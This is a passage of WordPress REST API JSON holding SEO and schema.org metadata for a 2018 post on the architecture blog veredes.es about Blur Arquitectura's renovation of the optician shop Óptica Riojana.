2018\\\/04\\\/face-96x96.jpg\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/face-96x96.jpg\",\"caption\":\"veredes\"},\"description\":\"Surge enero de 2009 como b\u00fasqueda de satisfacer el conocimiento de la actividad arquitect\u00f3nica y tangentes que se generan. La idea es crear un espacio para divulgar los diversos proyectos en busca de nueva inspiraci\u00f3n y de intercambio.\",\"sameAs\":[\"https:\\\/\\\/veredes.es\\\/\",\"https:\\\/\\\/www.facebook.com\\\/veredesArquitecturayDivulgacion\\\/\",\"https:\\\/\\\/www.instagram.com\\\/veredes\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/veredes-arquitectura-y-divulgacion\\\/\",\"https:\\\/\\\/www.pinterest.es\\\/veredes\\\/\",\"https:\\\/\\\/x.com\\\/https:\\\/\\\/twitter.com\\\/veredes\",\"https:\\\/\\\/veredes.tumblr.com\\\/\"],\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/author\\\/alberto\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[:es]\u00d3ptica Riojana | Blur Arquitectura[:gl]\u00d3ptica Rioxana | Blur Arquitectura[:en]Riojana Optics | Blur Arquitectura[:] - veredes","description":"Toda la informaci\u00f3n sobre: [:es]\u00d3ptica Riojana | Blur Arquitectura[:gl]\u00d3ptica Rioxana | Blur Arquitectura[:en]Riojana Optics | Blur Arquitectura[:]","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/","og_locale":"es_ES","og_type":"article","og_title":"[:es]\u00d3ptica Riojana | Blur Arquitectura[:gl]\u00d3ptica Rioxana | Blur Arquitectura[:en]Riojana Optics | Blur Arquitectura[:] - veredes","og_description":"Toda la informaci\u00f3n sobre: [:es]\u00d3ptica Riojana | Blur Arquitectura[:gl]\u00d3ptica Rioxana | Blur Arquitectura[:en]Riojana Optics | Blur Arquitectura[:]","og_url":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/","og_site_name":"veredes, arquitectura y divulgaci\u00f3n","article_publisher":"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","article_author":"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","article_published_time":"2018-07-09T22:01:34+00:00","article_modified_time":"2018-07-10T22:30:50+00:00","og_image":[{"width":1200,"height":882,"url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o2.jpg","type":"image\/jpeg"}],"author":"veredes","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/veredes","twitter_site":"@veredes","twitter_misc":{"Escrito por":"veredes","Tiempo de lectura":"5 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/#article","isPartOf":{"@id":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/"},"author":{"name":"veredes","@id":"https:\/\/veredes.es\/blog\/#\/schema\/person\/0bbb669073ef7faba5168a0844e93d2c"},"headline":"\u00d3ptica Riojana | Blur Arquitectura","datePublished":"2018-07-09T22:01:34+00:00","dateModified":"2018-07-10T22:30:50+00:00","mainEntityOfPage":{"@id":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/"},"wordCount":974,"commentCount":0,"publisher":{"@id":"https:\/\/veredes.es\/blog\/#organization"},"image":{"@id":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/#primaryimage"},"thumbnailUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o2.jpg","keywords":["Alex Borr\u00e1s","arquitectura espa\u00f1ola","arquitectura riojana","Blur Arquitectura","dise\u00f1o interiores","enric farrerons","espacio interior","local comercial","Maria de Castro","reforma","reforma interior","Xiomara Laso"],"articleSection":["arquitectura","equipamiento sanitario","obras","reforma interior","slider principal"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/","url":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/","name":"[:es]\u00d3ptica Riojana | Blur Arquitectura[:gl]\u00d3ptica Rioxana | Blur Arquitectura[:en]Riojana Optics | Blur Arquitectura[:] - veredes","isPartOf":{"@id":"https:\/\/veredes.es\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/#primaryimage"},"image":{"@id":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/#primaryimage"},"thumbnailUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o2.jpg","datePublished":"2018-07-09T22:01:34+00:00","dateModified":"2018-07-10T22:30:50+00:00","description":"Toda la informaci\u00f3n sobre: [:es]\u00d3ptica Riojana | Blur Arquitectura[:gl]\u00d3ptica Rioxana | Blur Arquitectura[:en]Riojana Optics | Blur Arquitectura[:]","breadcrumb":{"@id":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/#primaryimage","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o2.jpg","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/07\/\u00d3ptica-Riojana-Blur-Arquitectura-o2.jpg","width":1200,"height":882},{"@type":"BreadcrumbList","@id":"https:\/\/veredes.es\/blog\/optica-riojana-blur-arquitectura\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/veredes.es\/blog\/"},{"@type":"ListItem","position":2,"name":"\u00d3ptica Riojana | Blur Arquitectura"}]},{"@type":"WebSite","@id":"https:\/\/veredes.es\/blog\/#website","url":"https:\/\/veredes.es\/blog\/","name":"veredes, arquitectura y divulgaci\u00f3n","description":"veredes","publisher":{"@id":"https:\/\/veredes.es\/blog\/#organization"},"alternateName":"veredes","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/veredes.es\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/veredes.es\/blog\/#organization","name":"veredes, arquitectura y divulgaci\u00f3n","alternateName":"veredes","url":"https:\/\/veredes.es\/blog\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2021\/12\/veredes-logo-centrado_140x54.png","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2021\/12\/veredes-logo-centrado_140x54.png","width":140,"height":54,"caption":"veredes, arquitectura y divulgaci\u00f3n"},"image":{"@id":"https:\/\/veredes.es\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","https:\/\/x.com\/veredes","https:\/\/instagram.com\/veredes\/","https:\/\/www.linkedin.com\/company\/veredes-arquitectura-y-divulgacion\/","https:\/\/es.pinterest.com\/veredes\/","https:\/\/www.tumblr.com\/veredes"]},{"@type":"Person","@id":"https:\/\/veredes.es\/blog\/#\/schema\/person\/0bbb669073ef7faba5168a0844e93d2c","name":"veredes","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/face-96x96.jpg","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/face-96x96.jpg","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/face-96x96.jpg","caption":"veredes"},"description":"Surge enero de 2009 como b\u00fasqueda de satisfacer el conocimiento de la actividad arquitect\u00f3nica y tangentes que se generan. La idea es crear un espacio para divulgar los diversos proyectos en busca de nueva inspiraci\u00f3n y de intercambio.","sameAs":["https:\/\/veredes.es\/","https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","https:\/\/www.instagram.com\/veredes\/","https:\/\/www.linkedin.com\/company\/veredes-arquitectura-y-divulgacion\/","https:\/\/www.pinterest.es\/veredes\/","https:\/\/x.com\/https:\/\/twitter.com\/veredes","https:\/\/veredes.tumblr.com\/"],"url":"https:\/\/veredes.es\/blog\/author\/alberto\/"}]}},"_links":{"self":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts\/69770","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/comments?post=69770"}],"version-history":[{"count":0,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts\/69770\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/media\/69773"}],"wp:attachment":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/media?parent=69770"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/categories?post=69770"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/tags?post=69770"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}